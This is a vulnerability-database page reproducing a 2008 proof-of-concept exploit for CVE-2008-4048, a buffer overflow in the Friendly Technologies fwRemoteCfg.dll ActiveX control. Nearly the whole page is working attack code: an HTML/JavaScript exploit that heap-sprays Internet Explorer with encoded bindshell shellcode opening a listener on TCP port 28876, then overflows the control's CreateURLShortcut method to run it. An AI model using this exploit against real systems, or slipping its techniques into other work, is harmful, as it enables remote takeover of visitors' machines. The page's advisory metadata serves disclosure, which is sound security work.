Bug: Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit ( Ascii Version )

Search:
WLB2

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Published
Credit
Risk
2008.09.14
spdr.
Medium
CWE
CVE
Local
Remote
CWE-119
CVE-2008-4048
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

<!--
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up thire connections.
They also provide remote configuration solutions .. not the best idea if you ask me.

An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:

==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================

* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->

<html>
<title>Friendly Technologies - wayyy too friendly...</title>

<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B"
id="sucker"></object>
<input type="button" value="Exploit!"

<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...

// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode =
unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc
1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc
031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uf
f90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ub
b50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uf
fff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6
d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5
353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u1
2bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.

var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the Nop slide
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks

spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide


// [heap header][nopslide][shellcode]
memory = new Array();
for (k = 0; k < heapBlocks; k++)
memory[k] = spraySlide + ShellCode;

// Create Evil Buffer
while(Evil.length < 800)
Evil += "A";
Evil += DamnIE;

// Pwn
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to
make a file.
}

function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide += spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>

</html>

References:

http://xforce.iss.net/xforce/xfdb/44755
http://www.securityfocus.com/bid/30891
http://www.milw0rm.com/exploits/6323
http://secunia.com/advisories/31644

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version